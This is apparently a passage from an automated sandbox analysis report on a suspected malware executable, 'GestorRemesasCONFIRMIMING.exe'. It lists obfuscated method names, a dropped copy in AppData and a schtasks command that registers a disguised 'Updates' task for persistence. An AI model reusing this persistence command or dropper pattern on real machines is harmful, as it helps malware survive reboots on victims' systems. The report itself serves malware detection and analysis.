                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, YhXSrqAJ228jLnWkCH.csHigh entropy of concatenated method names: 'EYFBg3H5xa', 'KomBchLlDM', 'nx1BXSIn6X', 'iA3BeBF32y', 'tyRBdhTBtt', 'wOlBUgeEq6', 'J04BxjSPfI', 'dnCBn1f16A', 'jD0B1XSlrB', 'T27BfZNAqd'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, qrI5eWPSKF9OqclJGk.csHigh entropy of concatenated method names: 'vDY6vU173V', 'rrx6JCmcle', 'Vn76PTGheS', 'Yof6kinPxx', 'zDq6MJUF8Z', 'Dnd6SdUIUK', 'opm6yT6sCn', 'BGt6iSMMS5', 'cvb6Zx2hcT', 'NZv692NEpA'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, e3Cguqpfxu89Mvv15T.csHigh entropy of concatenated method names: 'Q8Z4dUR6w', 'pJJQMpUln', 'cQtFFHqFh', 'IErHIy90E', 'zr2Gs8E5a', 'qBWCVum5Y', 'fpJ22tCU4TnvIG8pkM', 'eQfMgKofRPlEd9GQBZ', 'PddBuTQbo', 'mHqqM0QMh'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, MSjeT55arsm4NWwVWSs.csHigh entropy of concatenated method names: 'wjY2o23fOX', 'VEd2wUv2vQ', 'ddV24SNkOF', 'GjM2QuwDlA', 'aFQ2uM6VUY', 'kiJ2FNxtXL', 'Uhs2HEDwCk', 'Dwj2Dbeh2j', 'NKo2GVBZWK', 'jni2Cshyd9'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, DLW6uZz8LDw2tvCHRG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cTK2TJRbsr', 'gpU26RrGdw', 'XJF2jWfdfr', 'x1S2RWIiDP', 'awY2BgaIs3', 'ruv22USwAl', 'hl22qaJvnF'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.csHigh entropy of concatenated method names: 'fBQVNC1g7g', 'tFsVg1XxJU', 'DLfVco5gar', 'bXpVXmRS3t', 'C1LVe8lgsP', 'tjqVdGHPME', 'RcNVUSamUA', 'yQTVxGWttR', 'lToVnuEkKa', 'ioMV17DOHG'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, Ve41iQ9PJaAIEEUZNC.csHigh entropy of concatenated method names: 'dJ2UgJPlKU', 'fdRUXip73P', 'AS3UdtUsfh', 'Bbxd7HHZqP', 'wqOdzum1jI', 'ouYUaLLy14', 'ngoU5MJyqO', 'xqyUproAuM', 'VGvUVOOlxT', 'FpeUOJVh0W'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, GIgbxK5VWMd1fni7NmR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsIqP0MWJw', 'XOnqkDmd5Z', 'saIqI02eYx', 'vXcqrjWa4D', 'c9iq04oAOh', 'DEgqWJ6DEs', 'vIjq8IcBKv'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, O8Kju4WdatacJtMlao.csHigh entropy of concatenated method names: 'lwwRABcoHe', 'ksWR7oI3tf', 'WqKBaXwIyE', 'aeGB5u5ORu', 'EFhRt7b6UL', 'EEtRJyE33F', 'zmcRKWV2uk', 'Oe5RPAXlIP', 'xNSRksmxdJ', 'LmCRI7xEY0'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, NQnrfhcriRyJ7DvK1o.csHigh entropy of concatenated method names: 'Dispose', 'ABo5hGXJcQ', 'btNpMSoGUo', 'xFsbb1GNsk', 'A7h57XSrqJ', 'r285zjLnWk', 'ProcessDialogKey', 'FHUpa1ID0V', 'BNGp5TOnmn', 'lcappfZlr3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, zH39l8IGsmijULtLhe.csHigh entropy of concatenated method names: 'ToString', 'LS6jtCiGwp', 'RZ8jMxtfR2', 'chpjSybyur', 'P3sjyvlq17', 'kgUjivKiS8', 'VVLjZVk2Tu', 'a1Qj9PJDFe', 'd7Gjm3sSeY', 'tICjlYT7EL'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, mZlr3Q70sPyqcdFmuV.csHigh entropy of concatenated method names: 'NPp25fyoWd', 'lLT2Vyw4gc', 'FNj2Os6JR6', 'SGV2gqKS5N', 'h6H2c7ZlyU', 'fMw2eOvUbI', 'cug2dwu1y9', 'VwjB85D9YX', 'iQIBAOLvsy', 'XPiBhVsTOU'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, XS1NE3retZlaifF1ni.csHigh entropy of concatenated method names: 'srVR1oIvRa', 'piFRfqYb5H', 'ToString', 'iHGRgQWjSf', 'zgJRcLxZWC', 'uMuRXqKhK2', 'yGKRee0jJo', 'kx8RdQXLf7', 'B4bRUCs1bl', 'E0RRxBmvp8'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, A9QjLMYwTjItUACC7F.csHigh entropy of concatenated method names: 'wJGdNdYCLD', 'CmddcBiY0P', 'olIdeQNH1W', 'MwAdUnLHCq', 'UhTdx85iAj', 'VZye0MI0at', 'z6KeW3rscM', 'ykve8HRDao', 'jGYeArk7rY', 'vclehYVpJ3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, Kk2NMrOZGpdTfsfT7e.csHigh entropy of concatenated method names: 'OCF5U31OK3', 'IYL5xts9Kn', 'tQJ51pdQAt', 'kq95fG72Li', 'wMR56qlQ9Q', 'pLM5jwTjIt', 'wTEuUOva98X8VabJYj', 'XBta0PwnS1Uiw1lVtZ', 'temnn3NK2SyOuM6Q0d', 'MW655HbMvr'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, MqqPW7K7lpQUUAPgEw.csHigh entropy of concatenated method names: 'sq0TDmrOIQ', 'zhHTGatRAo', 'U39TYB7Q1k', 'q3bTMmR43t', 'EFJTynAip7', 'A6bTiPI4Rx', 'N04T9wScOh', 'ICkTm7Lv0Q', 'L0cTve9P03', 'RlvTtROPOT'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, b2uxQNlJT12B9qrnb4.csHigh entropy of concatenated method names: 'vAuUoqUrdo', 'pA8UwV80SC', 'HgOU4UcNKc', 'OZSUQGJvCR', 'OwFUu46GJI', 'rXKUFo92CE', 'cxTUHfo5yw', 'fCWUDQIeeF', 'fj1UGDL9QP', 'w5GUCERgW3'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, j1ID0VhuNGTOnmnnca.csHigh entropy of concatenated method names: 'ihYBY4OFVX', 'dbGBMUEnuj', 'lAIBS66N4F', 'HSIByOGwwu', 'gghBPIJdfH', 'ymIBi8vytC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, YerQAbGQJpdQAtxq9G.csHigh entropy of concatenated method names: 'IXJXQfQbTK', 'MPdXFNL8fx', 'zbHXDslvSP', 'CSuXGlVIlt', 'Y4ZX6BASHc', 'WsJXjLN1FG', 'RADXRqTif0', 'uD1XBUwbpm', 'LBnX2gCayx', 'ioWXqqpTfA'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, C31OK3DSYLts9Kn2AE.csHigh entropy of concatenated method names: 'vgocPKMEbO', 'ILfckZkvI5', 'hIAcItdYDW', 'CElcrt1ROd', 'Jjbc0AIUCP', 'vwLcWfBaS5', 'Ejgc8jbG4M', 'IBZcA2NClH', 'kBJchDXluq', 'l6qc7GsCR5'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, YhXSrqAJ228jLnWkCH.csHigh entropy of concatenated method names: 'EYFBg3H5xa', 'KomBchLlDM', 'nx1BXSIn6X', 'iA3BeBF32y', 'tyRBdhTBtt', 'wOlBUgeEq6', 'J04BxjSPfI', 'dnCBn1f16A', 'jD0B1XSlrB', 'T27BfZNAqd'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, qrI5eWPSKF9OqclJGk.csHigh entropy of concatenated method names: 'vDY6vU173V', 'rrx6JCmcle', 'Vn76PTGheS', 'Yof6kinPxx', 'zDq6MJUF8Z', 'Dnd6SdUIUK', 'opm6yT6sCn', 'BGt6iSMMS5', 'cvb6Zx2hcT', 'NZv692NEpA'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, e3Cguqpfxu89Mvv15T.csHigh entropy of concatenated method names: 'Q8Z4dUR6w', 'pJJQMpUln', 'cQtFFHqFh', 'IErHIy90E', 'zr2Gs8E5a', 'qBWCVum5Y', 'fpJ22tCU4TnvIG8pkM', 'eQfMgKofRPlEd9GQBZ', 'PddBuTQbo', 'mHqqM0QMh'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, MSjeT55arsm4NWwVWSs.csHigh entropy of concatenated method names: 'wjY2o23fOX', 'VEd2wUv2vQ', 'ddV24SNkOF', 'GjM2QuwDlA', 'aFQ2uM6VUY', 'kiJ2FNxtXL', 'Uhs2HEDwCk', 'Dwj2Dbeh2j', 'NKo2GVBZWK', 'jni2Cshyd9'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, DLW6uZz8LDw2tvCHRG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cTK2TJRbsr', 'gpU26RrGdw', 'XJF2jWfdfr', 'x1S2RWIiDP', 'awY2BgaIs3', 'ruv22USwAl', 'hl22qaJvnF'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.csHigh entropy of concatenated method names: 'fBQVNC1g7g', 'tFsVg1XxJU', 'DLfVco5gar', 'bXpVXmRS3t', 'C1LVe8lgsP', 'tjqVdGHPME', 'RcNVUSamUA', 'yQTVxGWttR', 'lToVnuEkKa', 'ioMV17DOHG'
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
